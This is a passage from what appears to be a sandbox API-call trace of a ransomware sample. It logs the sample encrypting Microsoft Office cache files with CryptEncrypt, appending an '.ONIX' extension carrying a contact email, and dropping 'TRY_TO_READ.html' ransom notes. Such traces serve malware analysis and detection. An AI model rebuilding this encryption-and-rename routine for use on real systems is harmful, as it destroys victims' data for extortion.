Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0126.485] GetProcessHeap () returned 0x410000 [0126.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0126.485] FindNextFileW (in: hFindFile=0x4e0d00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0126.485] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x510 [0126.486] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.486] LockFile (hFile=0x510, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5b2, nNumberOfBytesToLockHigh=0x0) returned 1 [0126.486] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.486] ReadFile (in: hFile=0x510, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0126.488] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.488] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.488] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0126.488] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0126.488] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", dwFileAttributes=0x80) returned 1 [0126.488] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 82 [0126.488] GetProcessHeap () returned 0x410000 [0126.488] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0126.488] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" [0126.488] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0126.488] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1458) returned 1 [0126.488] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5b2 [0126.488] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0126.488] GetProcessHeap () returned 0x410000 [0126.488] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0126.489] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0126.489] WriteFile (in: hFile=0x510, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0126.491] WriteFile (in: hFile=0x510, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0126.492] WriteFile (in: hFile=0x510, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0126.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5b2) returned 0x4e1b68 [0126.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5b2) returned 0x4e2128 [0126.493] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.493] ReadFile (in: hFile=0x510, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x5b2, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x5b2, lpOverlapped=0x0) returned 1 [0126.493] SetFilePointer (in: hFile=0x510, lDistanceToMove=-1458, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.493] WriteFile (in: hFile=0x510, lpBuffer=0x4e2128*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e2128*, lpNumberOfBytesWritten=0x367f44c*=0x5b2, lpOverlapped=0x0) returned 1 [0126.494] UnlockFile (hFile=0x510, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5b2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0126.494] CloseHandle (hObject=0x510) returned 1 [0126.494] GetProcessHeap () returned 0x410000 [0126.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0126.495] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0126.496] GetProcessHeap () returned 0x410000 [0126.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0126.496] FindNextFileW (in: hFindFile=0x4e0d00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x427f81b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0126.497] FindNextFileW (in: hFindFile=0x4e0d00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x427f81b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0126.497] CloseHandle (hObject=0x3cc) returned 1 [0126.497] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.497] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x5, wMilliseconds=0x36a)) [0126.497] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0126.497] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0126.497] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0126.497] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\10339c354ca09c354b444c.lock") returned 91 [0126.497] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\10339c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\10339c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0126.498] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.498] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.498] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x449cf0 [0126.498] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x471c2bb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x471c2bb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0d40 [0126.498] FindNextFileW (in: hFindFile=0x4e0d40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x471c2bb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x471c2bb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0126.499] FindNextFileW (in: hFindFile=0x4e0d40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0126.499] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x514 [0126.499] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.499] LockFile (hFile=0x514, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1a588, nNumberOfBytesToLockHigh=0x0) returned 1 [0126.499] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.499] ReadFile (in: hFile=0x514, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0126.501] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.501] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.501] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0126.501] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0126.501] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", dwFileAttributes=0x80) returned 1 [0126.501] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 81 [0126.501] GetProcessHeap () returned 0x410000 [0126.501] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x112) returned 0x46a198 [0126.501] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" [0126.501] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0126.501] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=107912) returned 1 [0126.501] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1a588 [0126.501] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0126.501] GetProcessHeap () returned 0x410000 [0126.501] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0126.501] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0126.501] WriteFile (in: hFile=0x514, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0126.503] WriteFile (in: hFile=0x514, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0126.504] WriteFile (in: hFile=0x514, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0126.505] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a588) returned 0xf70048 [0126.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a588) returned 0xf8a5d8 [0126.506] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.506] ReadFile (in: hFile=0x514, lpBuffer=0xf70048, nNumberOfBytesToRead=0x1a588, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x1a588, lpOverlapped=0x0) returned 1 [0126.512] UnlockFile (hFile=0x514, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1a588, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0126.512] CloseHandle (hObject=0x514) returned 1 [0126.512] GetProcessHeap () returned 0x410000 [0126.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0126.512] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0126.515] GetProcessHeap () returned 0x410000 [0126.515] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0126.515] FindNextFileW (in: hFindFile=0x4e0d40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x471c2bb0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x471c2bb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x471c2bb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0126.515] FindNextFileW (in: hFindFile=0x4e0d40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x471c2bb0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x471c2bb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x471c2bb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0126.515] CloseHandle (hObject=0x3cc) returned 1 [0126.516] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.516] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x5, wMilliseconds=0x379)) [0126.516] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0126.516] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0126.516] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0126.516] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us9c354ca09c354b444c.lock") returned 99 [0126.516] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0126.517] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.517] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.517] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x4decd0 [0126.517] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x47f00610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x47f00610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0d80 [0126.517] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x47f00610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x47f00610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0126.517] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0126.517] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x518 [0126.518] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.518] LockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x266a00, nNumberOfBytesToLockHigh=0x0) returned 1 [0126.519] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.519] ReadFile (in: hFile=0x518, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0126.520] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.520] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.520] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0126.520] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0126.520] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", dwFileAttributes=0x80) returned 1 [0126.520] lstrlenW (lpString="C:\\\\MSOCache\\All 